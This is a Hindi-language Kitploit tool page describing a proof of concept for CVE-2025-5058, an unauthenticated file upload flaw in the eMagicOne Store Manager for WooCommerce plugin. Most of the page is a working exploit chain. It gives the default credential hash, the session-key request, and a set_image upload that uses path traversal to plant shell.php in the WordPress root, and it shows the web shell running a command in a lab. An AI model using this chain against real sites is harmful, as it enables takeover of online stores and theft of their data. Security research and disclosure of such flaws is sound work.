Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-5058 — eMagicOne Store Manager for WooCommerce <= 1.2.5 - set_image Task के माध्यम से बिना प्रमाणीकरण के मनमाना फ़ाइल अपलोड | Kitploit
उपकरण/GitHubGitHub/d0n601/cve-2025-5058
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगरेड टीमिंग
GitHubd0n601/cve-2025-5058

CVE-2025-5058

eMagicOne Store Manager for WooCommerce <= 1.2.5 - set_image Task के माध्यम से बिना प्रमाणीकरण के मनमाना फ़ाइल अपलोड

रिपॉजिटरी देखें
1111 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

eMagicOne Store Manager for WooCommerce <= 1.2.5 - अनधिकृत मनमानी फ़ाइल अपलोड set_image कार्य के माध्यम से

eMagicOne Store Manager for WooCommerce प्लगइन एक दूरस्थ प्रबंधन प्रोटोकॉल एंडपॉइंट (?connector=bridge) को उजागर करता है जो सर्वर पर फ़ाइल अपलोड की अनुमति देता है। प्रमाणीकरण तंत्र डिफ़ॉल्ट क्रेडेंशियल जोड़ी (login=1, password=1) और एक सत्र कुंजी प्रणाली पर निर्भर करता है। यदि डिफ़ॉल्ट क्रेडेंशियल नहीं बदले जाते हैं, तो एक हमलावर आसानी से प्रमाणित कर सकता है, एक सत्र कुंजी प्राप्त कर सकता है, और set_image कार्य के माध्यम से WordPress रूट या किसी भी लिखने योग्य निर्देशिका में मनमानी फ़ाइलें (PHP शैल सहित) अपलोड कर सकता है।

पुनरुत्पादन

  • एक POC CVE-2025-5058.py प्रदान किया गया है जो shell.php नामक एक वेब शेल अपलोड करने वाले हमलावर को प्रदर्शित करता है।
root@kitploit:~
python CVE-2025-5058.py https://lab1.hacker [*] सत्र कुंजी का अनुरोध किया जा रहा है... [*] कच्चा प्रतिक्रिया: {"response_code":20,"revision":11,"module_version":"1.2.5","session_key":"03877e9c7c21be0a8022d0d9397bb5c4d153a7cd51d2ddc2c398465160747f24"} [+] सत्र कुंजी प्राप्त: 03877e9c7c21be0a8022d0d9397bb5c4d153a7cd51d2ddc2c398465160747f24 [*] set_image के माध्यम से फ़ाइल अपलोड की जा रही है... [*] अपलोड प्रतिक्रिया: <br /> <b>Warning</b>: Trying to access array offset on false in <b>/home/vagrant/research/Lab1/wp-content/plugins/store-manager-connector/classes/class-emosmcwoocommerceoverrider.php</b> on line <b>324</b><br /> <br /> <b>Warning</b>: Trying to access array offset on false in <b>/home/vagrant/research/Lab1/wp-content/plugins/store-manager-connector/classes/class-emosmcwoocommerceoverrider.php</b> on line <b>325</b><br /> {"response_code":"19","message":"Unable to resize one or more of your pictures"} [*] वेब शेल कमांड निष्पादित किए जा रहे हैं... <pre>1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000 link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00 inet 127.0.0.1/8 scope host lo valid_lft forever preferred_lft forever inet6 ::1/128 scope host valid_lft forever preferred_lft forever 2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000 link/ether 08:00:27:5b:34:2f brd ff:ff:ff:ff:ff:ff altname enp0s3 inet 10.0.2.15/24 metric 100 brd 10.0.2.255 scope global dynamic eth0 valid_lft 82708sec preferred_lft 82708sec inet6 fd17:625c:f037:2:a00:27ff:fe5b:342f/64 scope global dynamic mngtmpaddr noprefixroute valid_lft 85990sec preferred_lft 13990sec inet6 fe80::a00:27ff:fe5b:342f/64 scope link valid_lft forever preferred_lft forever 3: eth1: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000 link/ether 08:00:27:39:ea:eb brd ff:ff:ff:ff:ff:ff altname enp0s8 inet 192.168.56.56/24 brd 192.168.56.255 scope global eth1 valid_lft forever preferred_lft forever inet6 fe80::a00:27ff:fe39:eaeb/64 scope link valid_lft forever preferred_lft forever 4: docker0: <NO-CARRIER,BROADCAST,MULTICAST,UP> mtu 1500 qdisc noqueue state DOWN group default link/ether 02:42:0a:f0:30:8c brd ff:ff:ff:ff:ff:ff inet 172.17.0.1/16 brd 172.17.255.255 scope global docker0 valid_lft forever preferred_lft forever </pre>

कमजोर प्रवाह

डिफ़ॉल्ट क्रेडेंशियल और हैश गणना

प्लगइन सक्रियण पर, smconnector.php में निम्नलिखित स्थिरांक सेट किए जाते हैं:

root@kitploit:~
define( 'EMO_SMC_DEFAULT_LOGIN', '1' );
define( 'EMO_SMC_DEFAULT_PASSWORD', '1' );

प्रमाणीकरण के लिए उपयोग किया जाने वाला डिफ़ॉल्ट हैश है:

root@kitploit:~
'smconnector_hash'   => md5( EMO_SMC_DEFAULT_LOGIN . EMO_SMC_DEFAULT_PASSWORD ),

परिणाम: डिफ़ॉल्ट हैश md5('1' . '1') = c4ca4238a0b923820dcc509a6f75849b है।

सत्र कुंजी प्राप्ति

ब्रिज एंडपॉइंट पर हैश और एक कार्य (जैसे, get_version) के साथ POST अनुरोध भेजकर एक सत्र कुंजी प्राप्त की जाती है:

root@kitploit:~
POST /?connector=bridge
Content-Type: application/x-www-form-urlencoded

hash=c4ca4238a0b923820dcc509a6f75849b&task=get_version

प्रासंगिक कोड:
classes/class-emosmconnectorcommon.php (पंक्तियाँ ~441-525):

root@kitploit:~
private function check_auth() {
    if ( $this->shop_cart->isset_request_param( 'key' ) ) {
        // ... सत्र कुंजी सत्यापन ...
    } elseif ( $this->shop_cart->isset_request_param( 'hash' ) ) {
        $hash = (string) $this->shop_cart->get_request_param( 'hash' );
        if ( ! $this->is_hash_valid( $hash ) ) {
            // ... त्रुटि ...
        }
        $key = $this->generate_session_key( $hash );
        // ... सत्र कुंजी लौटाएँ ...
    }
}

सत्र कुंजी भंडारण

सत्र कुंजी wp_smconnector_session_keys तालिका में संग्रहीत की जाती है:

root@kitploit:~
private function generate_session_key( $hash ) {
    $key = hash( 'sha256', $hash . $timestamp );
    $sql = 'INSERT INTO `' + self::TABLE_SESSION_KEYS
        + "` (`session_key`, `date_added`, `last_activity`) VALUES ('" + $this->shop_cart->p_sql( $key ) + "', '"
        + $date + "', '" + $date + "')";
    $this->shop_cart->exec_sql( $sql );
    return $key;
}

मनमानी फ़ाइल अपलोड

एक वैध सत्र कुंजी के साथ, एक हमलावर set_image कार्य का उपयोग करके एक फ़ाइल अपलोड कर सकता है, मनमानी फ़ाइलें लिखने के लिए पैरामीटर का दुरुपयोग कर सकता है:

root@kitploit:~
POST /?connector=bridge
Content-Type: multipart/form-data

task=set_image&entity_type=product&image_id=../../shell.php&key=<session_key>
[email protected];type=text/plain

प्रासंगिक कोड:
classes/class-emosmconnectorcommon.php (पंक्तियाँ ~2115+):

root@kitploit:~
private function set_image() {
    // ... पैरामीटर जांच ...
    if ( ! $this->shop_cart->set_image( $entity_type, $image_id, self::UPLOAD_FILE_NAME, $type ) ) {
        $this->generate_error( $this->br_errors['upload_image_error'] );
    }
}

classes/class-emosmcwoocommerceoverrider.php (पंक्तियाँ ~272+):

root@kitploit:~
public function set_image( $entity_type, $image_id, $img, $type ) {
    // ...
    $destination_path = $this->get_shop_root_dir() . "$entity_type/$image_id";
    // ...
    $result = move_uploaded_file( $tmp_name, $destination_path );
    // ...
}

परिणाम: फ़ाइल WordPress रूट (या किसी भी निर्दिष्ट निर्देशिका, image_id में पथ ट्रैवर्सल के माध्यम से) में लिखी जाती है।

टूल डाउनलोड करें